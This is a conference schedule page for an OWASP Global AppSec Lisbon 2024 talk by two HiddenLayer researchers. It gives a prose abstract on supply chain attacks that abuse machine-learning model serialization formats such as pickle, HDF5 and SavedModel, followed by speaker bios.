Name: Malice in Chains: Supply Chain Attacks Using Machine Learning Models
Start: 2024-06-28T10:30:00+0100
End: 2024-06-28T11:15:00+0100

Malice in Chains: Supply Chain Attacks Using Machine Learning Models

This past year marked a rapid acceleration in the adoption of artificial intelligence. As AI-based solutions have started to dominate the market, a new cyber attack vector opened up taking CISOs by surprise: the exploitation of the underlying machine-learning models. These models are often treated as black boxes that process the input data and compute the output, communicating with users through an API/UI while their internals are hidden away. However, it is crucial to understand that these models are essentially code - and as such, can be manipulated in unexpected and potentially malicious ways.

ML models are stored, shared, and transferred using serialization formats, such as JSON, pickle, and HDF5. While some of these formats have been known to be vulnerable, there is still not enough clarity on how the attackers can subvert these models and how they can be used to create real damage to the victims. Unlike software, ML artifacts are not routinely checked for integrity, cryptographically signed, or even scanned by anti-malware solutions, which makes them the perfect target for cyber adversaries looking to fly under the radar.

In this talk, we show how an adversary can abuse machine learning models to carry out highly damaging supply chain attacks. We start by exploring several model serialization formats used by popular ML libraries, including PyTorch, Keras, TensorFlow, and scikit-learn. We show how each of these formats can be exploited to execute arbitrary code and bypass security measures, leading to the compromise of critical ML infrastructure systems. We present various code execution methods in Python’s pickle format, show the possible abuse of Keras lambda layers in HDF5, exploit SavedModel file format via unsafe TensorFlow I/O operations, and more. Finally, we demonstrate a supply chain attack scenario in which a ransomware payload is hidden inside an ML model using steganography and then reconstructed and executed through a serialization vulnerability when the model is loaded into memory.

With the rise of public model repositories, such as Hugging Face, businesses are increasingly adopting pre-trained models in their environments, often unaware of the associated risks. Our aim is to prove that machine learning artifacts can be exploited and manipulated in the same way as any other software, and should be treated as such - with utmost care and caution.

Speakers

Tom Bonner

VP of Research, HiddenLayer

Tom Bonner is the Vice President of Research at HiddenLayer, responsible for a multidisciplinary team of researchers investigating novel attacks against ML/AI systems. Tom has over two decades of experience in cyber-security, previously working with Norman, HP, Cylance, and BlackBerry... Read More →

Marta Janus

Principal Researcher, HiddenLayer

Marta is a Principal Researcher at HiddenLayer, focused on investigating adversarial machine learning attacks and the overall security of AI-based solutions. Prior to HiddenLayer, Marta spent over a decade working as a researcher for leading anti-virus vendors. She has extensive experience... Read More →

Friday June 28, 2024 10:30am - 11:15am WEST

Breakout: Breaker Track

Audience intermediate

Feedback form isn't open yet.

OWASP Global AppSec Lisbon 2024

Tom Bonner

Marta Janus

Attendees (1)

OWASP Global AppSec Lisbon 2024

Sign up or log in to save this to your schedule, view media, leave feedback and see who's attending!

Tom Bonner

Marta Janus

Attendees (1)